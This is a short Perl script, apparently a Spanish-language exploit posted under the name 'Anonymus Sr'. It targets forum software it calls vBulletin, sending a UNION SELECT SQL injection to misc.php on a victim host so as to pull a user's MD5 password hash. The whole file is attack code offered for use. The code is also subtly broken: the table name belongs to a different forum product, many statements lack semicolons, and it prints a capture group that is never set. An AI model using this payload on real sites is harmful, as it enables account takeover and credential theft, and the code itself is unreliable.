#!/usr/bin/perl
use IO::Socket;
print q{
######################################################
# Inyeccion sql by Anonymus Sr #
# vbulletin Exploit inyeccion remota sql #
# #
######################################################
};
if (!$ARGV[2]) {
print q{
usar: perl Exploit.pl host /directorio/ victima_userid
perl Exploit.pl
www.victima.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print
"------------------------------------------------------------------------------------------------\r\n"
print "[>] SERVER : $server\r\n"
print "[>] DIRECTORIO: $dir\r\n"
print "[>] USERID : $user\r\n"
print
"------------------------------------------------------------------------------------------------\r\n\r\n"
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
20WHERE%20(uid='".$user ;
print "[~] PREPARANDO PARA CONECTAR...\r\n"
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$server", PeerPort => "80") || die "[-]
CONEXION FALLIDA XD"
print "[+] CONECTADO\r\n"
print "[~] OBTENIENDO DATOS...\r\n"
print $socket "GET $path HTTP/1.1\r\n"
print $socket "Host: $server\r\n"
print $socket "ACEPTADO: */*\r\n"
print $socket "CoNEXION: close\r\n\r\n"
print "[+] DE LUJO!xD \r\n\r\n"
print "--[ HASH MD5
]--------------------------------------------------------------------------------------\r\n"
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "HASH MD5: ".$2."\r\n"
print
"--------------------------------------------------------------------------------------\r\n"
}
exit();
}
}
print
"--------------------------------------------------------------------------------------\r\n"
#Anonymus Sr